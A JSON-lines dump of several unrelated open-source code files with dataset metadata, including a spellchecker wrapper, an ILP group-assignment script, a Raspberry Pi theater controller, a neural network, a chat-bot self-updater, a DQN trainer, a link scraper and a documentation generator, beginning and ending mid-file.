binary else 'hunspell'\n\n def setup_spellchecker(self, task):\n \"\"\"Setup spell checker.\"\"\"\n\n return task.get('hunspell', {})\n\n def setup_dictionary(self, task):\n \"\"\"Setup dictionary.\"\"\"\n\n dictionary_options = task.get('dictionary', {})\n output = os.path.abspath(dictionary_options.get('output', self.dict_bin))\n wordlists = dictionary_options.get('wordlists', [])\n if wordlists:\n self.compile_dictionary('', dictionary_options.get('wordlists', []), None, output)\n else:\n output = None\n return output\n\n def compile_dictionary(self, lang, wordlists, encoding, output):\n \"\"\"Compile user dictionary.\"\"\"\n\n wordlist = ''\n\n try:\n output_location = os.path.dirname(output)\n if not os.path.exists(output_location):\n os.makedirs(output_location)\n if os.path.exists(output):\n os.remove(output)\n\n self.log(\"Compiling Dictionary...\", 1)\n # Read word lists and create a unique set of words\n words = set()\n for wordlist in wordlists:\n with open(wordlist, 'rb') as src:\n for word in src.read().split(b'\\n'):\n words.add(word.replace(b'\\r', b''))\n\n # Sort and create wordlist\n with open(output, 'wb') as dest:\n dest.write(b'\\n'.join(sorted(words)) + b'\\n')\n except Exception:\n self.log('Problem compiling dictionary.', 0)\n self.log(\"Current wordlist '%s'\" % wordlist)\n raise\n\n def spell_check_no_pipeline(self, sources, options, personal_dict):\n \"\"\"Spell check without the pipeline.\"\"\"\n\n for source in sources:\n if source._has_error(): # pragma: no cover\n yield Results([], source.context, source.category, source.error)\n\n cmd = self.setup_command(source.encoding, options, personal_dict, source.context)\n self.log('', 3)\n self.log(\"Command: \" + str(cmd), 4)\n try:\n wordlist = util.call_spellchecker(cmd, input_text=None, encoding=source.encoding)\n yield Results(\n [w for w in sorted(set(wordlist.replace('\\r', '').split('\\n'))) if w],\n source.context,\n source.category\n )\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n def setup_command(self, encoding, options, personal_dict, file_name=None):\n \"\"\"Setup command.\"\"\"\n\n cmd = [\n self.binary,\n '-l'\n ]\n\n if encoding:\n cmd.extend(['-i', encoding])\n\n if personal_dict:\n cmd.extend(['-p', personal_dict])\n\n disallowed = {\n '1', 'a', 'D', 'G', 'h', 'help', 'l', 'L', 'm', 'P', 's', 'S', 'v', 'vv', 'w'\n }\n\n for k, v in options.items():\n if k not in disallowed:\n key = ('-%s' if len(k) == 1 else '--%s') % k\n if isinstance(v, bool) and v is True:\n cmd.append(key)\n elif isinstance(v, str):\n cmd.extend([key, v])\n elif isinstance(v, int):\n cmd.extend([key, str(v)])\n elif isinstance(v, list):\n for value in v:\n cmd.extend([key, str(value)])\n\n if file_name is not None:\n cmd.append(file_name)\n\n return cmd\n\n\ndef iter_tasks(matrix, names, groups):\n \"\"\"Iterate tasks.\"\"\"\n\n # Build name index\n name_index = {task.get('name', ''): index for index, task in enumerate(matrix)}\n\n for index, task in enumerate(matrix):\n name = task.get('name', '')\n group = task.get('group', '')\n hidden = task.get('hidden', False)\n if names and name in names and index == name_index[name]:\n yield task\n elif groups and group in groups and not hidden:\n yield task\n elif not names and not groups and not hidden:\n yield task\n\n\ndef spellcheck(config_file, names=None, groups=None, binary='', checker='', sources=None, verbose=0, debug=False):\n \"\"\"Spell check.\"\"\"\n\n hunspell = None\n aspell = None\n spellchecker = None\n config = util.read_config(config_file)\n if sources is None:\n sources = []\n\n matrix = config.get('matrix')\n preferred_checker = config.get('spellchecker', 'aspell')\n if matrix is None:\n matrix = config.get('documents')\n if matrix is not None:\n util.warn_deprecated(\"'documents' key in config is deprecated. 'matrix' should be used going forward.\")\n else:\n raise KeyError(\n 'Unable to find or load matrix from pyspelling'\n ' configuration, for more'\n ' details on configuration please read'\n ' https://facelessuser.github.io/pyspelling/configuration/'\n )\n\n groups = set() if groups is None else set(groups)\n names = set() if names is None else set(names)\n\n # Sources are only recognized when requesting a single name.\n if (len(names) != 1 and len(sources)):\n sources = []\n\n processed_tasks = 0\n for task in iter_tasks(matrix, names, groups):\n\n processed_tasks += 1\n\n if not checker:\n checker = preferred_checker\n\n if checker == \"hunspell\": # pragma: no cover\n if hunspell is None:\n hunspell = Hunspell(config, binary, verbose, debug)\n spellchecker = hunspell\n\n elif checker == \"aspell\":\n if aspell is None:\n aspell = Aspell(config, binary, verbose, debug)\n spellchecker = aspell\n else:\n raise ValueError('%s is not a valid spellchecker!' % checker)\n\n spellchecker.log('Using {} to spellcheck {}'.format(checker, task.get('name', '')), 1)\n for result in spellchecker.run_task(task, source_patterns=sources):\n spellchecker.log('Context: %s' % result.context, 2)\n yield result\n spellchecker.log(\"\", 1)\n\n if processed_tasks == 0:\n raise ValueError(\n 'There are either no tasks in the configuration file'\n ' or the specified name or group can not be found.'\n )\n","repo_name":"facelessuser/pyspelling","sub_path":"pyspelling/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":24401,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"83"} +{"seq_id":"10362148432","text":"# -*- coding: utf-8 -*-\n\nimport collections\nimport csv\nimport numpy as np\nimport pulp\nimport argparse\n\ndef load_preference(filename):\n preference = {}\n group_list = []\n user_list = []\n with open(filename) as fin:\n reader = csv.reader(fin)\n header = True\n for row in reader:\n if header:\n header = False\n group_list = [v[v.find(\"[\")+1:-1] for v in row[3:]]\n else:\n user = \"%s,%s\" % (row[1], row[2])\n user_list.append(user)\n preference[user] = {}\n for (g, v) in zip(group_list, row[3:]):\n preference[user][g] = int(v)\n return preference, user_list, group_list\n\n\ndef find_best_assignment(user_list, group_list, preference):\n average = len(user_list) / 3\n model = pulp.LpProblem('assignment problem', pulp.LpMinimize)\n assignment = pulp.LpVariable.dicts('assignment', (user_list, group_list),\n lowBound=0, upBound=1, cat=pulp.LpInteger)\n group_chosen = pulp.LpVariable.dicts('chosen', group_list,\n lowBound=0, upBound=1, cat=pulp.LpInteger)\n model += sum([preference[u][g] * assignment[u][g]\n for u in user_list\n for g in group_list])\n # constraints: each person in a group\n for u in user_list:\n model += sum([assignment[u][g] for g in group_list]) == 1\n # constraints only three groups chosen\n model += sum([group_chosen[g] for g in group_list]) == 3\n # constraints each group with similar number of people\n for g in group_list:\n model += (sum([assignment[u][g] for u in user_list]) - average * group_chosen[g] ) >= 0\n model += (sum([assignment[u][g] for u in user_list]) - (average + 1) * group_chosen[g] ) <= 0\n model.solve()\n return assignment, group_chosen\n\ndef output_result(user_list, group_list, assignment, output_file):\n group_results = collections.defaultdict(list)\n for u in user_list:\n for g in group_list:\n if assignment[u][g].value() == 1:\n group_results[g].append(u)\n with open(output_file, \"w\") as fout:\n for key in group_results:\n fout.write(\"%s\\n\" % key)\n for user in group_results[key]:\n fout.write(\"%s\\n\" % user)\n fout.write(\"\\n\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type=str,\n help=\"input preferences in csv format from google forms\")\n parser.add_argument(\"-o\", \"--output\", type=str,\n help=\"output file for assignments\")\n args = parser.parse_args()\n \n preference, user_list, group_list = load_preference(args.input)\n assignment, group_chosen = find_best_assignment(user_list, group_list, preference)\n output_result(user_list, group_list, assignment, args.output)\n\n","repo_name":"chenhaot/reading_group_assignment_ilp","sub_path":"ilp_solve.py","file_name":"ilp_solve.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32162462575","text":"import subprocess\nimport time\nimport os\nfrom curses import wrapper, curs_set\nfrom motor import StepperMotor, CLOCKWISE, COUNTERCLOCKWISE\nimport RPi.GPIO as GPIO\n\nVIDEO_DIR = \"./video\"\nVLC_CMD_BASE = [\n \"vlc\",\n \"--no-audio\",\n \"--fullscreen\",\n \"--no-video-title-show\",\n \"--play-and-exit\",\n \"--quiet\"\n]\nMOTOR_PINS = [11, 13, 15, 16]\nMOTOR_STEPS = 4000\nMOTOR_SPEED = 0.001\nLED_PINS = [12]\nOPEN = CLOCKWISE # also for make the lights go up\nCLOSE = COUNTERCLOCKWISE # or make the lights go down\n\n(_, _, filenames) = next(os.walk(VIDEO_DIR))\n\ndef play_all_movies(stdscr):\n try:\n gpio_init()\n motor = StepperMotor(*MOTOR_PINS)\n curs_set(0)\n stdscr.clear()\n for f in filenames:\n video = os.path.join(VIDEO_DIR, f)\n cmd = VLC_CMD_BASE + [video]\n resp = subprocess.check_call(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n cycle_curtain(motor, stdscr)\n except KeyboardInterrupt:\n pass\n GPIO.cleanup()\n\ndef gpio_init():\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(MOTOR_PINS + LED_PINS, GPIO.OUT)\n\ndef cycle_curtain(motor: StepperMotor, stdscr):\n curs_set(0)\n stdscr.clear()\n stdscr.addstr(0, 0, \"Drawing curtain\")\n stdscr.refresh()\n run_curtain(motor, MOTOR_STEPS, OPEN, MOTOR_SPEED)\n motor.run(4000, CLOCKWISE, 0.001)\n stdscr.addstr(1, 0, \"Lights up!\")\n stdscr.refresh()\n pwm = run_lights(OPEN, 5)\n time.sleep(10)\n stdscr.addstr(2, 0, \"Lights down!\")\n run_lights(CLOSE, 5, pwm)\n stdscr.refresh()\n stdscr.addstr(3, 0, \"Drawing curtain back\")\n stdscr.refresh()\n run_curtain(motor, MOTOR_STEPS, CLOSE, MOTOR_SPEED)\n\ndef run_curtain(motor: StepperMotor, steps: int, d: bool, step_time: float):\n motor.run(steps, d, step_time)\n\ndef run_lights(up: bool, cycle_time: float, pwm=None):\n \"\"\"\n cycle time should be in seconds - how long it should take to run the cycle.\n as soon as the PWM object goes out of scope, it shuts itself off.\n so we have to return p and make sure to assign it to something.\n smells a little hacky, but why not?\n \"\"\"\n if pwm is None:\n pwm = GPIO.PWM(LED_PINS[0], 100)\n starting_cycle = 0 if up else 100\n pwm.start(starting_cycle)\n dc_steps = list()\n if up:\n dc_steps = range(0, 101, 1)\n else:\n dc_steps = range(100, -1, -1)\n interval = cycle_time / len(dc_steps)\n for dc in dc_steps:\n pwm.ChangeDutyCycle(dc)\n time.sleep(interval)\n return pwm\n\n\nif __name__ == \"__main__\":\n # gpio_init()\n # pwm = run_lights(OPEN, 5)\n # print(\"done with light?\")\n # time.sleep(5)\n # run_lights(CLOSE, 5, pwm)\n # GPIO.cleanup()\n wrapper(play_all_movies)\n","repo_name":"briehl/rpi-theater","sub_path":"theater.py","file_name":"theater.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30020014760","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.preprocessing import OneHotEncoder\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nmpl.rcParams['axes.unicode_minus'] = False\n\n#sigmoid函数\ndef g(z, deriv=False):\n if deriv == True:\n return z*(1-z)\n return 1.0/(1+np.exp(-z))\n\n#模型\ndef model(x ,theta1, theta2):\n z2 = x.dot(theta1)\n a2 = g(z2)\n z3 = a2.dot(theta2)\n a3 = g(z3)\n return a2, a3\n\n#代价函数\ndef costfunc(h, y):\n m = len(h)\n J = -1.0/m*np.sum(y*np.log(h)+(1-y)*np.log(1-h))\n return J\n\n#精度\ndef score(h ,y):\n #多分类,转换为多个二分类问题,[0.1, 0.7, 0.1, 0.1] = [0, 1, 0, 0]\n m = len(h)\n count = 0\n for i in range(m):\n if np.argmax(h[i]) == np.argmax(y[i]):\n count += 1\n return count/m\n\n#BP算法\ndef BP(a1, a2, a3, y, theta1, theta2, alpha):\n delta3 = a3-y #反向转播,误差\n delta2 = delta3.dot(theta2.T)*g(a2, deriv=True)\n m = len(a1)\n deltatheta1 = 1.0/m*a1.T.dot(delta2)\n deltatheta2 = 1.0/m*a2.T.dot(delta3)\n\n theta1 -= deltatheta1*alpha\n theta2 -= deltatheta2*alpha\n return theta1, theta2\n\n#梯度下降最优解\ndef gradDesc(x, y, hidden_layer_sizes=(17, ), max_iter=1500, alpha=0.1):\n m, n = x.shape #x与theta相乘\n col = y.shape[1]#标签数\n theta1 = 2*np.random.rand(n, hidden_layer_sizes[0])-1\n theta2 = 2*np.random.rand(hidden_layer_sizes[0], col)-1 #行与theta1结果对应,列于标签个数对应\n jarr = np.zeros(max_iter)\n\n for i in range(max_iter):\n a2, a3 = model(x, theta1, theta2)\n jarr[i] = costfunc(a3, y)\n theta1, theta2 = BP(x, a2, a3, y, theta1, theta2, alpha)\n return jarr, theta1, theta2\n\n#预处理\ndef preprocess(x, y):\n #标准缩放\n meanx = np.mean(x)\n sigma = np.std(x, ddof=1)\n x = (x-meanx)/sigma\n m = len(x)\n #预处理\n x = np.c_[np.ones((m, 1)), x]\n y = np.c_[y]\n return x, y\n\n#加载数据\nx = np.loadtxt('imgX.txt', delimiter=',')\ny = np.loadtxt('labely.txt', delimiter=',')\ny[y == 10] = 0\nx, y = preprocess(x, y)\n\n#多分类转为多个二分类问题\ncoder = OneHotEncoder(categories='auto') #categories类别 auto自动\ny = coder.fit_transform(y).toarray() #coder编码器 fit配合 transform 改变\n#将y变为0和1 \n\n#洗牌,洗牌整体下标对应元素改变,不影响预处理\nm = len(x)\nnp.random.seed(0)\norder = np.random.permutation(m) #permutation置换\nx = x[order]\ny = y[order]\nn = x.shape[0]\n\n#切分\nnum = int(m*0.7)\ntrainx, testx = np.split(x, [num])\ntrainy, testy = np.split(y, [num])\n\n#训练模型\njarr, theta1, theta2 = gradDesc(trainx, trainy, hidden_layer_sizes=(80, ), max_iter=2000)\n\n#计算预测值\na2, trainh = model(trainx, theta1, theta2)\na2, testh = model(testx, theta1, theta2)\n\nplt.plot(jarr)\nplt.show()\n\nprint('train score', score(trainy, trainh))\nprint('test score', score(testy, testh))\n\n#将OneHotEncoder(编码)转为数值型,以正常画出混淆矩阵\ntesty = np.argmax(testy, axis=1)\ntesth = np.argmax(testh, axis=1)\n\nprint('混淆矩阵:\\n', confusion_matrix(testy, testh))\nprint('分类报告:\\n', classification_report(testy, testh))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"htqdgithub265104/test","sub_path":"machine_one/Neural_NetWork/Neural_Work_OHE.py","file_name":"Neural_Work_OHE.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"9884003621","text":"\"\"\" Pulls in the new version of PagerMaid from the git server. \"\"\"\n\nimport platform\nfrom subprocess import run, PIPE\nfrom datetime import datetime\nfrom time import strftime\nfrom os import remove\nfrom git import Repo\nfrom git.exc import GitCommandError, InvalidGitRepositoryError, NoSuchPathError\nfrom pagermaid import log\nfrom pagermaid.listener import listener\nfrom pagermaid.utils import execute\n\n\n@listener(is_plugin=False, outgoing=True, command=\"update\",\n description=\"从远程来源检查更新,并将其安装到 PagerMaid-Modify。\",\n parameters=\"\")\nasync def update(context):\n if len(context.parameter) > 1:\n await context.edit(\"无效的参数。\")\n return\n await context.edit(\"正在检查远程源以进行更新 . . .\")\n parameter = None\n if len(context.parameter) == 1:\n parameter = context.parameter[0]\n repo_url = 'https://github.com/xtaodada/PagerMaid-Modify.git'\n\n if parameter:\n if parameter == \"debug\":\n # Version info\n git_version = run(\"git --version\", stdout=PIPE, shell=True).stdout.decode().strip().replace(\"git version \", \"\")\n git_change = bool(run(\"git diff-index HEAD --\", stdout=PIPE, shell=True).stdout.decode().strip())\n git_change = \"是\" if git_change else \"否\"\n git_date = run(\"git log -1 --format='%at'\", stdout=PIPE, shell=True).stdout.decode()\n git_date = datetime.utcfromtimestamp(int(git_date)).strftime(\"%Y/%m/%d %H:%M:%S\")\n git_hash = run(\"git rev-parse --short HEAD\", stdout=PIPE, shell=True).stdout.decode().strip()\n get_hash_link = f\"https://github.com/xtaodada/PagerMaid-Modify/commit/{git_hash}\"\n # Generate the text\n text = \"系统名称及版本号:`\" + str(platform.platform()) + \"`\\n系统版本号:`\" + str(platform.version()) + \"`\\n系统位数:`\" + platform.architecture()[0] + \"`\\nPython 版本号:`\" + str(platform.python_version()) + \"`\\n\\nGit 版本号:`\" + git_version + \"`\\n本地修改:\" + git_change + \"\\n哈希值:[\" + git_hash + \"](\" + get_hash_link + \")\\n提交时间:`\" + git_date + \"`\"\n await context.edit(text)\n return\n\n try:\n repo = Repo()\n except NoSuchPathError as exception:\n await context.edit(f\"出错了呜呜呜 ~ 目录 {exception} 不存在。\")\n return\n except InvalidGitRepositoryError:\n await context.edit(f\"此 PagerMaid-Modify 实例不是从源安装,\"\n f\" 请通过您的本机软件包管理器进行升级。\")\n return\n except GitCommandError as exception:\n await context.edit(f'出错了呜呜呜 ~ 收到了来自 git 的错误: `{exception}`')\n return\n\n active_branch = repo.active_branch.name\n if not await branch_check(active_branch):\n await context.edit(\n f\"出错了呜呜呜 ~ 该分支未维护: {active_branch}.\")\n return\n\n try:\n repo.create_remote('upstream', repo_url)\n except BaseException:\n pass\n\n upstream_remote = repo.remote('upstream')\n upstream_remote.fetch(active_branch)\n changelog = await changelog_gen(repo, f'HEAD..upstream/{active_branch}')\n\n\n if not parameter:\n if not changelog:\n await context.edit(f\"`PagerMaid-Modify 在分支 ` **{active_branch}**` 中已是最新。`\")\n return\n changelog_str = f'**找到分支 {active_branch} 的更新.\\n\\n更新日志:**\\n`{changelog}`'\n if len(changelog_str) > 4096:\n await context.edit(\"更新日志太长,正在附加文件。\")\n file = open(\"output.log\", \"w+\")\n file.write(changelog_str)\n file.close()\n await context.client.send_file(\n context.chat_id,\n \"output.log\",\n reply_to=context.id,\n )\n remove(\"output.log\")\n else:\n await context.edit(changelog_str + \"\\n**执行 \\\"-update true\\\" 来安装更新。**\")\n return\n\n\n await context.edit('找到更新,正在拉取 . . .')\n\n try:\n try:\n upstream_remote.pull(active_branch)\n except:\n await execute(\"\"\"git status | grep modified | sed -r \"s/ +/ /\" | cut -f2 | awk -F \" \" '{print \"mkdir -p $(dirname ../for-update/\" $2 \") && mv \" $2 \" ../for-update/\" $2}' | sh\"\"\")\n await execute(\"git pull\")\n await execute(\"\"\"cd ../for-update/ && find -H . -type f | awk '{print \"cp \" $1 \" ../PagerMaid-Modify/\" $1}' | sh && cd ../PagerMaid-Modify\"\"\")\n await execute(\"rm -rf ../for-update/\")\n await execute(\"python3 -m pip install -r requirements.txt --upgrade\")\n await execute(\"python3 -m pip install -r requirements.txt\")\n await log(\"PagerMaid-Modify 已更新。\")\n await context.edit(\n '更新成功,PagerMaid-Modify 正在重新启动。'\n )\n await context.client.disconnect()\n except GitCommandError:\n upstream_remote.git.reset('--hard')\n await log(\"PagerMaid-Modify 更新失败。\")\n await context.edit(\n '更新时出现错误,PagerMaid-Modify 正在重新启动。'\n )\n await context.client.disconnect()\n\n\nasync def changelog_gen(repo, diff):\n result = ''\n d_form = \"%d/%m/%y\"\n for c in repo.iter_commits(diff):\n result += f'•[{c.committed_datetime.strftime(d_form)}]: {c.summary} <{c.author}>\\n'\n return result\n\n\nasync def branch_check(branch):\n official = ['master', 'staging']\n for k in official:\n if k == branch:\n return 1\n return\n","repo_name":"mylanyong/PagerMaid-Modify","sub_path":"pagermaid/modules/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"33319488139","text":"import random\nimport math\nimport torch\nimport torch.nn as nn\nfrom collections import namedtuple\nfrom collections import deque\nimport sys\nsys.path.append('../')\nfrom trainer import Trainer, Experience\n\nclass WithMultiStepTrainer(Trainer):\n def __init__(self, agent, env, logger=None, multi_step_num=3):\n super().__init__(agent, env, logger)\n self.multi_step_num = multi_step_num\n \n def train(self, episode_count=500, buffer_size=50000, batch_size=32, learning_start_buffer_size=4096, gamma=0.9, render=False, disp_freq=10):\n # ロガーの初期化\n config_data = {\n \"episode_count\": episode_count,\n \"buffer_size\":buffer_size,\n \"batch_size\":batch_size,\n \"learning_start_buffer_size\":learning_start_buffer_size,\n \"gamma\": gamma,\n }\n self.logger.initialize(str(self.env.spec), config_data)\n\n self.experiences = deque(maxlen=buffer_size)\n\n # ��去の状態を保存しておくためのキュー\n # 現在のステップを含めてmulti_step_num回分の情報を使って更新をしていくため、multi_step_num-1回分のデータを保持できるようにしておく\n past_states = deque(maxlen=self.multi_step_num-1)\n past_actions = deque(maxlen=self.multi_step_num-1)\n past_rewards = deque(maxlen=self.multi_step_num-1)\n\n # 指定した回数分エピソードを実行\n for e in range(episode_count):\n past_states.clear()\n past_actions.clear()\n past_rewards.clear()\n\n s = self.env.reset()\n s = torch.from_numpy(s).float().unsqueeze(0)\n episode_reward = 0.0\n done = False\n # エピソード実行\n while not done:\n if render:\n self.env.render()\n \n # エージェントの方策にしたがって環境を更新\n a = self.agent.policy(s)\n n_state, reward, done, info = self.env.step(a[0][0].item())\n n_state = torch.from_numpy(n_state).float().unsqueeze(0)\n\n if len(past_states) == self.multi_step_num-1:\n # multi_step_num分の報酬(r_t1 + gamma*r_t2 + ... + gamma^n*r_tn-1)を計算\n sum_reward = 0.0\n for i in range(self.multi_step_num-1):\n sum_reward += past_rewards[i] * math.pow(gamma, i)\n sum_reward += reward * math.pow(gamma, self.multi_step_num-1)\n\n # multi_step_num前の状態のexperienceを記憶\n experience = Experience(past_states[0], past_actions[0], sum_reward, n_state, done)\n self.experiences.append(experience)\n\n if len(self.experiences) > learning_start_buffer_size:\n batch = random.sample(self.experiences, batch_size)\n self.agent.update(batch, math.pow(gamma, self.multi_step_num)) # Q(s', a')にかかるγはmulti_step_num乗される\n\n # 過去の情報を更新\n past_states.append(s)\n past_actions.append(a)\n past_rewards.append(reward)\n\n # 状態を更新\n s = n_state\n episode_reward += reward\n \n self.agent.update_target_model()\n\n self.logger.add({\"episode\":e, \"reward\":episode_reward, \"epsilon\":self.agent.epsilon})\n # 一定間隔ごとにlog表示\n if e % disp_freq == 0:\n print(\"At episode {}, reward={}, epsilon={}\".format(e, self.logger.get(\"reward\", disp_freq), self.agent.epsilon))\n","repo_name":"KASSII/reinforcement-learning","sub_path":"DQN/DQN_with_multi_step/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20285676863","text":"# BasicLinkScraper\n# (c)2021 Trevor D. Brown.\n# Distributed under the MIT license.\n#\n# BasicLinkScraper.py - scrapes a specified base URL's specified pages for\n# specified links with specified extensions. Adapted\n# from the GeeksForGeek's article:\n# https://www.geeksforgeeks.org/python-program-to-recursively-scrape-all-the-urls-of-the-website/\n#\n# History:\n# 02/16/2021 - Trevor D. Brown\n# Created file.\n# Began adapting script for my specific use cases.\n#\n# Known Issues/TODOs:\n# TODO 1: Work on handling special links (i.e. mailto, tel, etc.)\n# TODO 2: Work on URLs with relative addressing (i.e. ./page.html, ./../another-page.html)\n# TODO 3: Find a better approach for try/except statement in scrape function.\n# TODO 4: Add support for file exports, instead of depending on shell output redirection.\n\nimport sys # used for argument parsing.\nfrom bs4 import BeautifulSoup # used for HTML parsing.\nimport requests # used to retrieve web pages.\n \n# scrape - scrapes a specified site\ndef scrape (site, base, extensions, linksOnly): \n # lists \n urls = [] \n\n if (not linksOnly):\n urls.append(\"%s:\" % (site))\n\n # GET request to the specified site.\n request = requests.get(site)\n \n # Parsing the returned HTML.\n parsedHTML = BeautifulSoup(request.text,\"html.parser\") \n \n # For all anchor tags found on the page, extract their href attribute.\n for element in parsedHTML.find_all(\"a\"):\n # Reference: TODO 3\n try:\n href = element.attrs['href'] \n \n # Reference: TODO 2\n if (str(href).startswith(\"./\")):\n site = base + str(href).replace(\"./\", \"\")\n else:\n site = base + href\n \n # If the site ends with a requested extension, or the user has specified any extension, add it to the list.\n if ((site.endswith(tuple(extensions))) or (extensions == [\"*\"])):\n if (site not in urls):\n # Get the format of the URL, based on the \"linksonly\" argument's status.\n urlString = \"\"\n\n if (not linksOnly):\n urlString = (\"\\t%s\" % (site))\n else:\n urlString = (\"%s\" % (site))\n\n urls.append(\"%s\" % (urlString))\n\n except:\n # We're not too concerned with exceptions...\n # but, this had to bere here to work. So...\n # yeah...\n 1==1\n \n return urls\n\n# parseArgs - determine what has been defined\ndef parseArgs ():\n # Variables that are passed via command line arguments:\n baseURL = \"\" # The base URL for the website (i.e. https://www.example.com/)\n pages = [] # The list of pages requested for parsing, delimited by commas. (i.e. index.html,contacts.htm)\n extensions = [] # The list of extensions to look for during parsing, delimited by commas. (i.e. .pdf,.jpg)\n linksOnly = False # Determining if only the retrieved links are to be printed, or all extra statements.\n\n for i, arg in enumerate(sys.argv):\n if (i > 0):\n if ((arg == \"--baseURL\") or (arg == \"-u\")):\n baseURL = sys.argv[i+1]\n elif ((arg == \"--pages\") or (arg == \"-p\")):\n pages = sys.argv[i+1].split(\",\")\n elif ((arg == \"--extensions\") or (arg == \"-e\")):\n extensions = sys.argv[i+1].split(\",\")\n elif ((arg == \"--linksonly\")):\n linksOnly = True\n \n return baseURL, pages, extensions, linksOnly\n\n# main - the primary driver for the script.\ndef main ():\n \n allScrapedURLs = []\n baseURL, pages, extensions, linksOnly = parseArgs()\n \n if (baseURL):\n if (len(pages) <= 0):\n pages = [\"index.html\"] # Check only the index page of the site, if no specific page is given.\n\n if (len(extensions) <= 0):\n extensions = [\"*\"] # Get every href link, if no specific extension is given. \n\n for page in pages:\n site = baseURL + page\n \n # Scrape the page\n scrapedURLs = scrape(site, baseURL, extensions, linksOnly)\n\n allScrapedURLs.extend(scrapedURLs)\n\n if (len(allScrapedURLs) > 0):\n for url in allScrapedURLs:\n print(url)\n else:\n if (not linksOnly):\n print(\"No base URL defined.\")\n\n# Calling the main function...\nmain()","repo_name":"TrevorDBrown/Random","sub_path":"Python/BasicLinkScraper/BasicLinkScraper.py","file_name":"BasicLinkScraper.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"10267237238","text":"import collections\nimport json\nimport sys\n\nOpClasses = collections.OrderedDict()\n\ndef get_ir_classes(ops, defines):\n global OpClasses\n\n for op_key, op_vals in ops.items():\n if not (\"Last\" in op_vals):\n OpClass = \"#Unknown\"\n\n if (\"OpClass\" in op_vals):\n OpClass = op_vals[\"OpClass\"]\n\n if not (OpClass in OpClasses):\n OpClasses[OpClass] = []\n\n OpClasses[OpClass].append([op_key, op_vals])\n\n # Sort the dictionary after we are done parsing it\n OpClasses = collections.OrderedDict(sorted(OpClasses.items()))\n\ndef print_ir_op_index():\n output_file.write(\"# Index\\n\")\n output_file.write(\"## Op Classes\\n\")\n for class_key, class_value in OpClasses.items():\n output_file.write(\"- [%s](#%s)\\n\\n\" % (class_key, class_key))\n\n output_file.write(\"## Definitions\\n\")\n output_file.write(\"- [Defines](#Defines)\\n\\n\")\n\ndef print_ir_ops():\n for class_key, class_value in OpClasses.items():\n output_file.write(\"# %s\\n\\n\" % (class_key))\n for op in class_value:\n op_key = op[0]\n op_vals = op[1]\n output_file.write(\"## %s\\n\" % (op_key))\n HasDest = (\"HasDest\" in op_vals and op_vals[\"HasDest\"] == True)\n HasSSAArgs = (\"SSAArgs\" in op_vals and len(op_vals[\"SSAArgs\"]) > 0)\n HasSSAArgNames = \"SSANames\" in op_vals\n HasArgs = \"Args\" in op_vals\n SSAArgsCount = 0\n ArgCount = 0\n if (HasSSAArgs):\n SSAArgsCount = int(op_vals[\"SSAArgs\"])\n if (HasArgs):\n ArgCount = len(op_vals[\"Args\"])\n\n TotalArgsCount = SSAArgsCount + (ArgCount / 2)\n\n output_file.write(\">\")\n if (HasDest):\n output_file.write(\"%dest = \")\n\n output_file.write(\"%s \" % op_key)\n\n ArgComma = (\", \", \"\")\n if (HasSSAArgs):\n for i in range(0, SSAArgsCount):\n FinalArg = (i + 1) == TotalArgsCount\n if (HasSSAArgNames):\n output_file.write(\"%%%s%s\" % (op_vals[\"SSANames\"][i], ArgComma[FinalArg]))\n else:\n output_file.write(\"%%ssa%d%s\" % (i, ArgComma[FinalArg]))\n\n if (HasArgs):\n Args = op_vals[\"Args\"]\n for i in range(0, ArgCount, 2):\n FinalArg = ((i / 2) + SSAArgsCount + 1) == TotalArgsCount\n data_type = Args[i]\n data_name = Args[i + 1]\n output_file.write(\"\\<%s %s\\>%s\" % (data_type, data_name, ArgComma[FinalArg]))\n\n output_file.write(\"\\n\\n\")\n\n if (\"Desc\" in op_vals):\n desc = op_vals[\"Desc\"]\n if (isinstance(desc, list)):\n for line in desc:\n output_file.write(\"%s\\n\\n\" % line)\n else:\n output_file.write(\"%s\\n\" % op_vals[\"Desc\"])\n else:\n output_file.write(\"XXX: Missing op desc!\\n\")\n\ndef print_ir_defines(defines):\n output_file.write(\"## Defines\\n\")\n output_file.write(\"```cpp\\n\")\n for define in defines:\n output_file.write(\"%s\\n\" % (define))\n output_file.write(\"```\\n\")\n\nif (len(sys.argv) < 3):\n sys.exit()\n\noutput_filename = sys.argv[2]\njson_file = open(sys.argv[1], \"r\")\njson_text = json_file.read()\njson_file.close()\n\njson_object = json.loads(json_text)\njson_object = {k.upper(): v for k, v in json_object.items()}\n\nops = json_object[\"OPS\"]\ndefines = json_object[\"DEFINES\"]\n\nget_ir_classes(ops, defines)\n\noutput_file = open(output_filename, \"w\")\n\nprint_ir_op_index()\n\noutput_file.write(\"# IR 